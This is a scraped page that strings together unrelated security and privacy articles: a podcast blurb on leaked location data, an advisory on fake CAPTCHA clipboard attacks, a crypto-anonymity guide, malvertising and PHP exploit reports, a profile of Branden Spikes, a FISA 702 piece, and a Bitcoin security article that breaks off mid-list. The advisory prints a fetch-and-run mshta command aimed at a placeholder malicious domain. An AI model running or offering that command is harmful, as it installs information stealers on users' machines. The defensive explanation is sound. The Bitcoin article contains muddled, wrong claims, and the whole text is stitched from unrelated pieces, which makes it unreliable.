This week on the Lock and Code podcast, we speak with Tim Shott about his attempt to find his location data following a major data breach.

_This week on the Lock and Code podcast…_

Something’s not right in the world of location data.

In January, a location data broker named Gravy Analytics was hacked, with the alleged cybercriminal behind the attack posting an enormous amount of data online as proof. Though relatively unknown to most of the public, Gravy Analytics is big in the world of location data collection, and, according to an enforcement action from the US Federal Trade Commission last year, the company claimed to “collect, process, and curate more than 17 billion signals from around a billion mobile devices daily.”

Those many billions of signals, because of the hack, were now on display for security researchers, journalists, and curious onlookers to peruse, and when they did, they found something interesting. Listed amongst the breached location data were occasional references to thousands of popular mobile apps, including Tinder, Grindr, Candy Crush, My Fitness Pal, Tumblr, and more.

The implication, though unproven, was obvious: The mobile apps were named with specific lines of breached data because those apps were the _source_ of that breached data. And, considering how readily location data is traded directly from mobile apps to data brokers to advertisers, this wasn’t too unusual a suggestion.

Today, nearly every free mobile app makes money through ads. But ad purchasing and selling online is far more sophisticated than it used to be for newspapers and television programs. While companies still want to place their ads in front of demographics they believe will have the highest chance of making a purchase—think wealth planning ads inside the Wall Street Journal or toy commercials during cartoons—most of the process now happens through pieces of software that can place bids at data “auctions.” In short, mobile apps sometimes collect data about their users, including their location, device type, and even battery level. The apps then bring that data to an advertising auction, and separate companies “bid” on the ability to send their ads to, say, iPhone users in a certain time zone or Android users who speak a certain language.

This process happens every single day, countless times every hour, but in the case of the Gravy Analytics breach, some of the apps referenced in the data expressed that, one, they’d never heard of Gravy Analytics, and two, no advertiser had the right to collect their users’ location data.

In speaking to 404 Media, a representative from Tinder said:

“We have no relationship with Gravy Analytics and have no evidence that this data was obtained from the Tinder app.”

A representative for Grindr echoed the sentiment:

“Grindr has never worked with or provided data to Gravy Analytics. We do not share data with data aggregators or brokers and have not shared geolocation with ad partners for many years.”

And a representative for a Muslim prayer app, Muslim Pro, said much of the same:

“Yes, we display ads through several ad networks to support the free version of the app. However, as mentioned above, we do not authorize these networks to collect location data of our users.”

What all of this suggested was that some _other_ mechanism was allowing for users of these apps to have their locations leaked and collected online.

And to try to prove that, one independent researcher conducted an experiment: Could he find himself in his own potentially leaked data?

Today, on the Lock and Code podcast with host David Ruiz, we speak with independent research Tim Shott about his investigation into leaked location data. In his experiment, Shott installed two mobile games that were referenced in the breach, an old game called Stack, and a more current game called Subway Surfers. These games had no reason to know his location, and yet, within seconds, he was able to see more than a thousand requests for data that included his latitude, his longitude, and, as we’ll learn, a whole lot more.

> “ I was surprised looking at all of those requests. Maybe 10 percent of \[them had\] familiar names of companies, of websites, which my data is being sent to… I think this market works the way that the less you know about it, the better from their perspective.”

Tune in today to listen to the full conversation.

_how notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.**

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

 How ads weirdly know your screen brightness, headphone jack use, and location, with Tim Shott (Lock and Code S06E05) 

An increasing number of websites use a clipboard hijacker and instruct victims on how to infect their own machine.

There are more and more sites that use a clipboard hijacker and instruct victims on how to infect their own machine.

I realize that may sound like something trivial to steer clear from, but apparently it’s not because the social engineering behind it is pretty sophisticated.

At first, these attacks were more targeted at people that could provide cybercriminals a foothold at a targeted company, but their popularity has grown so much that now anyone can run into one of them.

It usually starts on a website that promises visitors some kind of popular content: Movies, music, pictures, news articles, you name it.

Nobody will think twice when they are asked to prove they are not a robot.

But the next step in this method isn’t what you would normally see. If you use the checkbox, you’ll be forwarded to something that looks like this:

> “To better prove you are not a robot, please:
> 
> 1.  Press & hold the Windows Key + R.
> 2.  In the verification windows, press Ctrl + V.
> 3.  Press Enter on your keyboard to finish.  
>     
> 
> You will observe and agree:  
> “I’m not a robot – reCAPTCHA Verification ID: 8253”
> 
> Perform the steps above to finish verification.”

While these instructions may seem harmless enough, if you follow the steps you will actually be infecting yourself with malware—most likely an information stealer. In the background, the website you visited copied a command to your clipboard. In Chromium based browsers (which are almost all the popular ones) a website can only write to your clipboard with your permission. But Windows was under the assumption that you agreed to that when you checked the checkbox in the first screen.

What the obstructions in the prompt are telling you to do is:

1.  Open the Run dialog box on Windows.
2.  Paste the content of your clipboard into that dialog box.
3.  Execute the command you just pasted.

They are not lying about what you will “observe”, but what they don’t tell you is that that’s only the last part of what you pasted, and what you are seeing is not really part of the command but just a comment added behind it.

But under normal circumstances, this is what will be visible.

You’ll only see the last part of the pasted content

The first part of what the target was instructed to paste are variations–sometimes obfuscated—of:

    mshta https://{malicious.domain}/media.file

Mshta is a command that will trigger the legitimate Windows executable mshta.exe. But mshta will fetch the malicious media file from the specified domain and run it. The name of the media file may look perfectly fine. We have seen mp3, mp4, jpg, jpeg, swf, html, and there will be other possibilities.

What the files are in reality is an encoded Powershell command which will run invisibly and download the actual payload. For a while, the malware we were seeing downloaded was almost exclusively the Lumma Stealer infostealer, but recently we’ve also found campaigns that use the same method to spread the SecTopRAT. Both of these are designed to steal sensitive data from your machine.

**How to stay safe**

There are a few things you can do to protect yourself from falling victim to these and similar methods:

*   Do not follow instructions provided by some website you visited without thinking it through.
*   Use an active anti-malware solution that blocks malicious websites and scripts.
*   Use a browser extension that blocks malicious domains and scams.
*   Disable JavaScript in your browser before visiting unknown websites.

The clipboard access is triggered by a JavaScript function document.execCommand(‘copy’).  Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.

Here are step-by-step instructions on how to disable JavaScript in several popular browsers:

**How to disable JavaScript in **Chrome****

*   Open Chrome and click on the three-dot menu icon in the top right corner.
*   Select **Settings** from the dropdown menu.
*   On the left side, click on **Privacy and security**.
*   Click on **Site setting**s.
*   Scroll down to the **Content** section and click on **JavaScript**.

Toggle the switch to **Don’t allow sites to use JavaScript** to **Disable JavaScript for all sites**. You can also add specific sites to block or allow JavaScript by clicking on **Add** under the **Block or Allow** sections.

**How to disable JavaScript in Firefox**

*   Open Firefox and click on the menu button (three horizontal lines) in the top right corner.
*   Select **Settings** from the dropdown menu.
*   Scroll to the **Privacy & Security** panel on the left side.
*   Find the **Permissions** section and locate the JavaScript setting.
*   Uncheck the box next to **Enable JavaScript** to disable JavaScript.
*   Restart Firefox if necessary for the changes to take effect.

**How to disable JavaScript in Opera**

*   Launch Opera and click on the settings icon.
*   Select **Privacy & Security** from the options.
*   Click on **Site Settings**.
*   Select the **JavaScript** option.
*   Choose **Don’t allow sites to use JavaScript** to disable JavaScript for all sites.

To disable JavaScript for specific sites, click **Add** under the **Not allowed to use JavaScript** section and enter the site’s URL.

**How to disable JavaScript in Edge**

*   Open Microsoft Edge and click on the three-dot menu icon in the top right corner.
*   Select **Settings** from the dropdown menu.
*   In the left sidebar, click on **Cookies** and **Site Permissions**.
*   Scroll down to the **All Permissions** section and select JavaScript.

Toggle the switch to disable JavaScript. You can also manage JavaScript settings for individual sites by adding them to the allow or block lists.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Fake CAPTCHA websites hijack your clipboard to install information stealers 

Cryptocurrency offers financial freedom, but it also comes with privacy challenges. Unlike traditional banking, where transactions remain relatively…

Cryptocurrency offers financial freedom, but it also comes with privacy challenges. Unlike traditional banking, where transactions remain relatively private within financial institutions, most crypto transactions are recorded on a public ledger, making it easy for third parties to track financial activities.

If maintaining privacy is a priority, taking extra precautions is essential. Whether you’re using crypto for transactions, remittances, or exploring decentralized finance, ensuring anonymity requires careful choices in how you buy, store, and use digital assets.

Not all cryptocurrencies provide the same level of privacy. Bitcoin and Ethereum, the two most widely used digital assets, operate on transparent blockchains where transaction histories are visible to anyone with access to a block explorer.

If privacy is a concern, it’s best to consider cryptocurrencies specifically designed for anonymity, such as Monero, which obscures transaction details through advanced cryptographic techniques, or Zcash, which offers optional privacy through shielded transactions. Even when using mainstream tokens, additional privacy tools and techniques can help keep your transactions discreet.

The choice of a crypto wallet also plays a significant role in privacy protection. Many wallets track user data, require identity verification, or leave transactions exposed. Privacy-conscious users should opt for wallets that allow complete control over private keys and offer anonymity features.

Samourai Wallet and Wasabi Wallet, for instance, include built-in tools to obscure transaction history, while Monero-specific wallets like Cake Wallet prioritize untraceable transfers. Electrum, when combined with Tor, can also enhance Bitcoin privacy. Choosing the right wallet ensures that financial activities remain as private as possible and free from centralized oversight.

Even with a privacy-friendly wallet, careless transaction habits can expose sensitive data. Using a new address for every transaction minimizes the risk of being tracked while coin-mixing services such as Whirlpool or Wasabi’s CoinJoin help break the link between sender and receiver. When sending transactions, using the Tor network or a VPN prevents IP address leaks that could connect wallet activity to a real-world identity.

When purchasing cryptocurrency, it’s best to avoid platforms that require extensive identity verification. Instead, consider decentralized exchanges or peer-to-peer platforms that allow anonymous trading. Buying crypto with cash, prepaid gift cards, or privacy-friendly payment methods further reduces exposure. As Shraddha states, you can buy crypto with a credit card and no verification, which preserves privacy. There are also options like bank transfers, PayPal, debit cards, and so on, so choose the one that is most convenient for you.

After acquiring cryptocurrency, proper storage is crucial for both privacy and security. Leaving funds on centralized exchanges exposes them to surveillance, hacks, and potential government intervention.

A more secure approach is using non-custodial wallets, hardware wallets, or even paper wallets, which keep private keys offline and out of reach of third parties. Hardware wallets such as Ledger and Trezor provide strong security, while cold storage solutions offer complete isolation from online threats. Taking control of private keys ensures that no one else has access to your funds, maintaining both privacy and autonomy.

In addition to secure storage, reducing exposure to tracking mechanisms used by online platforms is key. Many crypto-related services collect user data through browser tracking and analytics. Using a privacy-focused browser like Brave, Tor, or Firefox with tracking protections helps prevent unwanted surveillance.

When signing up for crypto services, creating separate email accounts with encrypted providers like ProtonMail or Tutanota can prevent linking transactions to a personal identity. Even on social media and forums, discussing holdings or transaction details can make users a target for scammers or government scrutiny. The less personal information is shared, the harder it becomes to be tracked.

Privacy risks in the crypto space are constantly evolving, and staying informed is essential. Governments worldwide are tightening regulations around anonymous transactions, while blockchain analysis firms develop sophisticated tracking techniques. Being aware of these developments helps users adapt their strategies and stay ahead of surveillance efforts.

Additionally, scams targeting privacy-conscious individuals are on the rise, often disguised as tools or services promising enhanced anonymity. Verifying the legitimacy of any service before use is crucial to avoid compromising personal security. Following privacy-focused news sources, joining discussions within the crypto community, and continuously learning about emerging threats can help maintain a strong privacy posture.

Navigating the crypto space while protecting privacy requires a deliberate approach. By choosing the right cryptocurrencies, securing funds in non-custodial wallets, using privacy-enhancing tools, and staying aware of tracking methods, users can maintain financial sovereignty without unnecessary exposure.

While increased regulatory pressure pushes for greater transparency, the means to transact privately still exist. Crypto was built on the foundation of financial independence, and ensuring privacy is a fundamental part of that vision. Taking the right precautions allows users to engage with digital assets on their own terms, free from intrusive surveillance and control.

Navigating Crypto Without Sacrificing Your Privacy

Microsoft Threat Intelligence exposes a malvertising campaign exploiting GitHub, Discord, and Dropbox. Discover the multi-stage attack chain, the…

Microsoft Threat Intelligence exposes a malvertising campaign exploiting GitHub, Discord, and Dropbox. Discover the multi-stage attack chain, the use of LOLBAS, and the various malware payloads. Get detailed analysis, IOCs, and mitigation recommendations.

Microsoft’s Threat Intelligence team has recently dismantled a large-scale malvertising campaign that impacted nearly one million devices worldwide. The primary targets were Windows systems running various browsers, including Chrome and Edge and it impacted a wide range of organizations, from individual users to large enterprises, which demonstrates its widespread impact.

Tracked under the name Storm-0408, this campaign was discovered in December 2024 and involved a multi-stage attack chain. According to Microsoft’s research report, shared with Hackread.com, the attack originated from illegal streaming websites where the attackers utilized compromised GitHub repositories to distribute malware as well as Discord and Dropbox for hosting some payloads. The malicious GitHub repositories have since been removed.

Users were initially redirected from illegal streaming sites, which embedded malicious advertisements within video frames “to generate pay-per-view or pay-per-click revenue,” leading to intermediate websites. These websites then redirected users to GitHub, where the first-stage malware payloads were hosted.

These repositories served as a launchpad for deploying additional malware and scripts. The initial malware established a foothold on the compromised devices, enabling the deployment of subsequent payloads – designed to collect system information and exfiltrate documents and data from the affected systems. 

The initial access payloads on GitHub were typically obfuscated JavaScript files that initiated the download and execution of further malware. The attack chain consisted of multiple stages, each with specific objectives as Microsoft explained in this image:

Attack Stages and Attack Chain (Source: Microsoft)

The first-stage payload, hosted on GitHub, acted as a dropper for the second-stage files. These files were used for system discovery, collecting information such as memory size, graphics details, screen resolution, operating system, and user paths. This data was then Base64-encoded and exfiltrated to a command-and-control (C2) server. A typical redirection chain might look like this:

illegalstreamingsite.com/movie.html -> malvertisingredirector.com/redirect.php -> intermediarysite.net/landing.html -> github.com/malicioususer/malware.js.

Depending on the second-stage payload, various third-stage payloads were deployed, which conducted additional malicious activities, including C2 communication, data exfiltration, and defence evasion techniques.

The attackers also utilized legitimate tools and scripts, and most importantly a technique known as “living-off-the-land binaries and scripts” (LOLBAS), to blend in with normal system activity. For example, one common tactic was to inject malicious code into the legitimate RegAsm.exe process to establish C2 connections and exfiltrate data.

The campaign employed a modular approach, with each stage dropping another payload with distinct functions including system discovery, credential theft, and data exfiltration. Persistence was achieved through modifications to the registry and the creation of shortcut files in the Windows Startup folder.

The prompt collaboration between Microsoft and GitHub in taking down malicious repositories highlights the importance of industry cooperation in combating cyber threats.

Microsoft has provided detailed recommendations to mitigate the impact of this threat, including strengthening Microsoft Defender for Endpoint configurations, enhancing operating environment security, and implementing multi-factor authentication.

Ensar Seker, Chief Security Officer at SOCRadar commented on the latest development stating, “The attackers used geofencing, device fingerprinting, and cloaking techniques to evade detection, which means the malicious payload is only delivered to targeted users, making it harder for security solutions to track and mitigate the campaign.”

“This campaign is likely part of a broader MaaS (Malware as a Service) ecosystem, where attackers use pre-built malvertising kits to distribute payloads like stealers, ransomware, and banking trojans,” Ensar added. “Malvertising has traditionally targeted Windows users, but with more professionals using macOS and Linux, we’ll see cross-platform payloads becoming more common.”

Microsoft Dismantles Malvertising Scam Using GitHub, Discord, Dropbox

Threat actors of unknown provenance have been attributed to a malicious campaign predominantly targeting organizations in Japan since January 2025.
"The attacker has exploited the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows, to gain initial access to victim machines," Cisco Talos researcher Chetan Raghuprasad said in a technical

PHP-CGI RCE Flaw Exploited in Attacks on Japan's Tech, Telecom, and E-Commerce Sectors

At 49, Branden Spikes isn't just one of the oldest technologists who has been involved in Elon Musk's Department of Government Efficiency (DOGE). As the current director of information technology at X/Twitter and an early hire at PayPal, Zip2, Tesla and SpaceX, Spikes is also among Musk's most loyal employees. Here's a closer look at this trusted Musk lieutenant, whose Russian ex-wife was once married to Elon's cousin.

At 49, **Branden Spikes** isn’t just one of the oldest technologists who has been involved in Elon Musk’s **Department of Government Efficiency** (DOGE). As the current director of information technology at **X/Twitter** and an early hire at **PayPal**, **Zip2**, **Tesla** and **SpaceX**, Spikes is also among Musk’s most loyal employees. Here’s a closer look at this trusted Musk lieutenant, whose Russian ex-wife was once married to Elon’s cousin.

The profile of Branden Spikes on X.

When President Trump took office again in January, he put the world’s richest man — Elon Musk — in charge of the **U.S. Digital Service**, and renamed the organization as DOGE. The group is reportedly staffed by at least 50 technologists, many of whom have ties to Musk’s companies.

DOGE has been enabling the president’s ongoing mass layoffs and firings of federal workers, largely by seizing control over computer systems and government data for a multitude of federal agencies, including the Social Security Administration, the Department of Homeland Security, the Office of Personnel Management, and the Treasury Department.

It is difficult to find another person connected to DOGE who has stronger ties to Musk than Branden Spikes. A native of California, Spikes initially teamed up with Musk in 1997 as a lead systems engineer for the software company Zip2, the first major venture for Musk. In 1999, Spikes was hired as director of IT at PayPal, and in 2002 he became just the fourth person hired at SpaceX.

In 2012, Spikes launched **Spikes Security**, a software product that sought to create a compartmentalized or “sandboxed” web browser that could insulate the user from malware attacks. A review of spikes.com in the Wayback Machine shows that as far back as 1998, Musk could be seen joining Spikes for team matches in the online games Quake and Quake II. In 2016, Spikes Security was merged with another security suite called Aurionpro, with the combined company renamed Cyberinc.

A snapshot of spikes.com from 1998 shows Elon Musk’s profile in Spike’s clan for the games Quake and Quake II.

Spikes’s LinkedIn profile says he was appointed head of IT at X in February 2025. And although his name shows up on none of the lists of DOGE employees circulated by various media outlets, multiple sources told KrebsOnSecurity that Spikes was working with DOGE and operates within Musk’s inner circle of trust.

In a conversation with KrebsOnSecurity, Spikes said he is dedicated to his country and to saving it from what he sees as certain ruin.

“Myself, I was raised by a southern conservative family in California and I strongly believe in America and her future,” Spikes said. “This is why I volunteered for two months in DC recently to help DOGE save us from certain bankruptcy.”

Spikes told KrebsOnSecurity that he recently decided to head back home and focus on his job as director of IT at X.

“I loved it, but ultimately I did not want to leave my hometown and family back in California,” Spikes said of his tenure at DOGE. “After a couple of months it became clear that to continue helping I would need to move to DC and commit a lot more time, so I politely bowed out.”

Prior to founding Spikes Security, Branden Spikes was married to a native Russian woman named **Natalia** whom he’d met at a destination wedding in South America in 2003.

Branden and Natalia’s names are both on the registration records for the domain name **orangetearoom\[.\]com**. This domain, which DomainTools.com says was originally registered by Branden in 2009, is the home of a tax-exempt charity in Los Angeles called the **California Russian Association**.

Here is a photo from a 2011 event organized by the California Russian Association, showing Branden and Natalia at one of its “White Nights” charity fundraisers:

Branden and Natalia Spikes, on left, in 2011. The man on the far right is Ivan Y. Podvalov, a board member of the Kremlin-aligned Congress of Russian Americans (CRA). The man in the center is Feodor Yakimoff, director of operations at the Transib Global Sourcing Group, and chairman of the Russian Imperial Charity Balls, which works in concert with the Russian Heritage Foundation.

In 2011, the Spikes couple got divorced, and Natalia changed her last name to Haldeman. That is not her maiden name, which appears to be “Libina.” Rather, Natalia acquired the surname Haldeman in 1998, when she married Elon Musk’s cousin.

**Reeve Haldeman** is the son of **Scott Haldeman**, who is the brother of Elon Musk’s mother, **Maye Musk**. Divorce records show Reeve and Natalia officially terminated their marriage in 2007. Reeve Haldeman did not respond to a request for comment.

A review of other domain names connected to Natalia Haldeman’s email address show she has registered more than a dozen domains over the years that are tied to the California Russian Association, and an apparently related entity called the **Russian Heritage Foundation, Inc.**:

russianamericans.org  
russianamericanstoday.com  
russianamericanstoday.org  
russiancalifornia.org  
russianheritagefoundation.com  
russianheritagefoundation.org  
russianwhitenights.com  
russianwhitenights.org  
theforafoundation.org  
thegoldentearoom.com  
therussianheritagefoundation.org  
tsarinahome.com

Ms. Haldeman did not respond to requests for comment. Her name and contact information appears in the registration records for these domains dating back to 2010, and a document published by _ProPublica_ show that by 2016 Natalia Haldeman was appointed CEO of the California Russian Foundation.

The domain name that bears both Branden’s and Natalia’s names — orangetearoom.com — features photos of Ms. Haldeman at fundraising events for the Russian foundation through 2014. Additional photos of her and many of the same people can be seen through 2023 at another domain she registered in 2010 — **russianheritagefoundation.com**.

A photo from Natalia Haldeman’s Facebook page shows her mother (left) pictured with Maye Musk, Elon Musk’s mother, in 2022.

The photo of Branden and Natalia above is from one such event in 2011 (tied to russianwhitenights.org, another Haldeman domain). The person on the right in that image — **Ivan Y. Podvalov** — appears in many fundraising event photos published by the foundation over the past decade. Podvalov is a board member of the **Congress of Russian Americans** (CRA), a nonprofit group that is known for vehemently opposing U.S. financial and legal sanctions against Russia.

Writing for _The Insider_ in 2022, journalist **Diana Fishman** described how the CRA has engaged in outright political lobbying, noting that the organization in June 2014 sent a letter to President Obama and the secretary of the United Nations, calling for an end to the “large-scale US intervention in Ukraine and the campaign to isolate Russia.”

“The US military contingents must be withdrawn immediately from the Eastern European region, and NATO’s enlargement efforts and provocative actions against Russia must cease,” the message read.

The Insider said the CRA director sent another two letters, this time to President Donald Trump, in 2017 and 2018.

“One was a request not to sign a law expanding sanctions against Russia,” Fishman wrote. “The other regretted the expulsion of 60 Russian diplomats from the United States and urged not to jump to conclusions on Moscow’s involvement in the poisoning of Sergei Skripal.”

The nonprofit tracking website CauseIQ.com reports that The Russian Heritage Foundation, Inc. is now known as **Constellation of Humanity**.

The Russian Heritage Foundation and the California Russian Association both promote the interests of the Russian Orthodox Church. This page indexed by Archive.org from russiancalifornia.org shows The California Russian Foundation organized a community effort to establish an Orthodox church in Orange County, Calif.

A press release from the **Russian Orthodox Church Outside of Russia** (ROCOR) shows that in 2021 the Russian Heritage Foundation donated money to organize a conference for the Russian Orthodox Church in Serbia.

A review of the “Partners” listed on the Spikes’ jointly registered domain — orangetearoom.com — shows the organization worked with a marketing company called **Russian American Media**. Reporting by KrebsOnSecurity last year showed that Russian American Media also partners with the problematic people-search service **Radaris**, which was formed by two native Russian brothers in Massachusetts who have built a fleet of consumer data brokers and Russian affiliate programs.

When asked about his ex-wife’s history, Spikes said she has a good heart and bears no ill-will toward anyone.

“I attended several of Natalia’s social events over the years we were together and can assure you that she’s got the best intentions with those,” Spikes told KrebsOnSecurity. “There’s no funny business going on. It is just a way for those friendly immigrants to find resources amongst each other to help get settled in and chase the American dream. I mean, they’re not unlike the immigrants from other countries who come to America and try to find each other and help each other find others who speak the language and share in the building of their businesses here in America.”

Spikes said his own family roots go back deeply into American history, sharing that his 6th great grandfather was Alexander Hamilton on his mom’s side, and Jessie James on his dad’s side.

“My family roots are about as American as you can get,” he said. “I’ve also been entrusted with building and safeguarding Elon’s companies since 1999 and have a keen eye (as you do) for bad actors, so have enough perspective to tell you that Natalia has no bad blood and that she loves America.”

Of course, this perspective comes from someone who has the utmost regard for the interests of the “special government employee” Mr. Musk, who has been bragging about tossing entire federal agencies into the “wood chipper,” and who recently wielded an actual chainsaw on stage while referring to it as the “chainsaw for bureaucracy.”

“Elon’s intentions are good and you can trust him,” Spikes assured.

A special note of thanks for research assistance goes to **Jacqueline Sweet**, an independent investigative journalist whose work has been published in The Guardian, Rolling Stone, POLITICO and The Intercept.

Who is the DOGE and X Technician Branden Spikes?

Tulsi Gabbard, the director of national intelligence, has long held anti-surveillance views. Now she oversees a key surveillance program she once tried to dismantle.

Former US congresswoman Tulsi Gabbard’s ascendance to director of national intelligence last month signaled a major shift in views toward government surveillance at the highest rung of the US intelligence community. While backing down from some of her more extreme anti-surveillance views in the run-up to her confirmation, Gabbard nevertheless held fast to a few promises of reform that have been traditionally eschewed by federal law enforcement leaders.

Now, some of the nation’s premier civil liberties organizations have begun lobbying America’s “top spy” to follow through on a pledge to bring about new levels of oversight and transparency to a key US surveillance program that’s long been plagued by reports of misuse.

Led by the American Civil Liberties Union, at least 20 major privacy groups this week urged Gabbard to declassify information concerning Section 702 of the Foreign Intelligence Surveillance Act (FISA)—the nation’s cornerstone wiretap authority that, while aimed at collecting intelligence on foreigners overseas, is known to vacuum up large quantities of calls, texts, and emails belonging to Americans.

In a letter first obtained by WIRED, the groups privately urged Gabbard this week to declassify information regarding the types of US businesses that can now be secretly compelled to install wiretaps on the US National Security Agency’s (NSA) behalf.

While it’s no secret that the government routinely compels phone and email service providers like AT&T and Google into conducting wiretaps, Congress passed a new provision last year expanding the range of businesses that can receive such orders. Legal experts had warned in advance that the provision was far too ambiguous and likely to vastly increase the number of Americans whose communications are wiretapped. But their warnings were not heeded.

It is widely assumed that the classified purpose behind the expanded authority is allowing the government to obtain access to communications in US data centers. Lawyers for the US Justice Department attempted to unilaterally expand the reach of the program in 2022, but its efforts were foiled by the secret surveillance court that oversees FISA. Only Congress has the power to expand FISA, the department was told.

As its a matter of secret law, lawmakers were unable to specify much about the limits of the government’s access in the provision they ultimately passed. This inevitably led to the adoption of a vague new definition for what the government calls an “electronic communications service provider” (ECSP)—the term for companies whose cooperation can be compelled under FISA.

Privacy experts and industry leaders had likewise raised concerns about introducing ambiguity into a law that defines the scope of a powerful surveillance tool, warning the changes could expose a near limitless new range of new businesses to secret government demands.

As WIRED reported last spring, opponents of the provision in Washington had cast the surveillance program’s new parameters as effectively “Stasi-like”—a reference to the defunct East German secret police agency notorious for infiltrating industry and forcing private citizens to spy on one another.

Senator Ron Wyden of Oregon, a renowned privacy hawk who has served on the Senate intelligence committee since just after 9/11, has referred to the new provision as “one of the most dramatic and terrifying expansions of government surveillance authority in history.”

Declassifying the new types of businesses that can actually be considered an ECSP is an essential step in bringing about clarity to an otherwise nebulous change in federal surveillance practices, according to the ACLU and the other organizations joined in its effort. “Without such basic transparency, the law will likely continue to permit sweeping NSA surveillance on domestic soil that threatens the civil liberties of all Americans,” the groups wrote in their letter to Gabbard this week.

The Office of the Director of National Intelligence did not respond to multiple requests for comment.

In addition to urging Gabbard to declassify details about the reach of the 702 program, the ACLU and others are currently pressing Gabbard to publish information to quantify just how many Americans have been “incidentally” wiretapped by their own government. Intelligence officials have long claimed that doing so would be “impossible,” as any analysis of the wiretaps would involve the government accessing them unjustifiably, effectively violating those Americans’ rights.

The privacy groups, however, point to research published in 2022 out of Princeton University, which details a methodology that could effectively solve that issue. “The intelligence community’s refusal to produce the requested estimate undermines trust and weakens the legitimacy of Section 702,” the groups say.

Gabbard is widely reported to have softened her stance against government spying while working to secure her new position as director of the nation’s intelligence apparatus. During the 116th Congress, for instance, Gabbard introduced legislation that sought to completely dismantle the Section 702 program, which is considered the “crown jewel” or US intelligence collection and crucial to keeping tabs on foreign threats abroad, including terrorist organizations and cybersecurity threats—exhibiting a stance far more extreme than those traditionally held by lawmakers and civil society organizations who’ve long campaigned for surveillance reform.

While begging off from this position in January, Gabbard’s newly espoused views have, in fact, brought her more closely in line with mainstream reformers. In response to questions from the US Senate ahead of her confirmation, for example, Gabbard backed the idea of requiring the Federal Bureau of Investigation to obtain warrants before accessing the communications of Americans swept up by the 702 program.

Slews of national security hawks from former House speaker Nancy Pelosi to former House intelligence committee chairman Mike Turner have long opposed this warrant requirement, as traditionally have all directors of the FBI. “This warrant requirement strengthens the \[intelligence community\] by ensuring queries are targeted and justified," Gabbard wrote in response to Senate questions in late January.

The Section 702 program was reauthorized last spring, but only for an additional two years. Early discussions about reauthorizing the program once more are expected to kick off again as early as this summer.

Sean Vitka, executive director of Demand Progress, one of the organizations involved in the lobbying effort, notes that Gabbard has a long history of supporting civil liberties, and refers to her recent statements about secret surveillance programs “encouraging.” “Congress needs to know, and the public deserves to know, what Section 702 is being used for,” Vitka says, “and how many Americans are swept up in that surveillance.”

“Section 702 has been repeatedly used to conduct warrantless surveillance on Americans, including journalists, activists, and even members of Congress,” adds Kia Hamadanchy, senior policy counsel for the ACLU. “Declassifying critical information, as well as providing long-overdue basic data about the number of US persons whose communications are collected under this surveillance are essential steps to increasing transparency as the next reauthorization debate approaches.”

Trump’s Spy Chief Urged to Declassify Details of Secret Surveillance Program

One of the many advancements in the financial system is the adoption of Bitcoin, which has shifted the…

One of the many advancements in the financial system is the adoption of Bitcoin, which has shifted the paradigm by offering a new method of banking within a cryptocurrency framework that is both decentralized and transparent. However, the digital aspect of this currency also poses unique cybersecurity problems. With the expansion of the cryptocurrency marketplace, cyber risks are also evolving, making it imperative to consider security when investing in or adopting Bitcoin.

**Table of Contents**

*   The Rising Threat of Cyberattacks on Bitcoin
*   Common Security Threats in Bitcoin Transactions
*   Securing Bitcoin: Best Practices for Cybersecurity
*   The Role of Blockchain in Enhancing Bitcoin Security
*   Bitcoin Regulation and Its Effect on Cybersecurity
*   The Future of Bitcoin Security
*   Conclusion

**The Rising Threat of Cyberattacks on Bitcoin**

The growing availability and usage of Bitcoin puts it on the radar of cybercriminals. Weaknesses in the crypto ecosystem are always being targeted by malicious actors, ranging from phishing bots to advanced exchange hacks. The multilevel marketing structure of Bitcoin means transactions are irreversible and further complicates the situation with lacking fund recovery options.

There has been a drastic shift in perspective on securing digital assets as the Bitcoin price changes. People have started investing with caution while monitoring the prices closely. Recent hacks toward key exchanges serve as a reminder that protective measures must be implemented to secure private holdings.

For example, in November 2023, the HTX (formerly Huobi) exchange was hacked, resulting in 30 million dollars worth of losses because of a compromised private key. This should alert us to the need for better multi-layer authentication and improved security measures. Also, in September 2023, covert private key thefts worth 70 million dollars to the CoinEx exchange showed the dire need for better key management systems.

**Common Security Threats in Bitcoin Transactions**

*   Phishing Attacks: Scammers use fake emails or web pages purporting to be from legitimate businesses and use them to extract private keys and passwords from unsuspecting users.
*   Exchange Hacks: An easy target for cybercriminals is centralized exchanges due to the huge sums of assets locked in their wallets. It has been a documented fact that numerous breaches have resulted in the theft of Bitcoins amounting to millions of dollars.
*   Malware and ransomware: There has been a rise in malicious programs poised to steal authentication credentials to a Bitcoin wallet or to hold user information hostage for a ransom payment.
*   Sim-Swapping Attacks: Interception of a target’s phone number and use of 2FA security codes to access crypto wallets without permission is possible with the attackers getting hold of a victim’s phone number.
*   Wallet Exploits: Even non-custodial wallets are at risk of being compromised by keyloggers and other forms of malware or bugs in the host program.

**Securing Bitcoin: Best Practices for Cybersecurity**

Measures requiring the adoption of stringent cybersecurity postures must be put in place to ensure Bitcoin is secure from cyber threats:

*   Use Hardware Wallets: These are offline cold storage solutions that add an extra layer of security as the hardware is not connected to the internet, where hackers may use the private key for malicious intent.
*   Enable Multi-Factor Authentication (MFA): Implementing two or more form factor identifiers on exchange accounts and wallets is a cynical plan for restricting unauthorized access.
*   Be Aware Of Security Risks: Keeping track of developments in cybersecurity helps numerous users prepare for a potential threat or scam that may arise.
*   Do Not Use Public Wi-Fi For Sensitive Transactions: The danger posed by public networks is that they may be subject to man-in-the-middle attacks, thus compromising personal transactions. For instance, in 2023, several users lost their money when hackers took advantage of unprotected public wireless networks to hijack Bitcoin transactions. This adds to the necessity for secure VPN use and underscores the need for safe connections while dealing with Bitcoins.
*   Check the URLs and Other Sources: Always ensure that login credentials are entered on legitimate web pages, especially before initiating Bitcoin transactions.

**The Role of Blockchain in Enhancing Bitcoin Security**

Blockchain technology protects Bitcoin from a good number of cyberattacks, even if it is constantly exposed to them.

*   Decentralization: Unlike banks, which rely on an institution, Bitcoin uses a ledger that is decentralized and thus has various opportunities for potential failures.
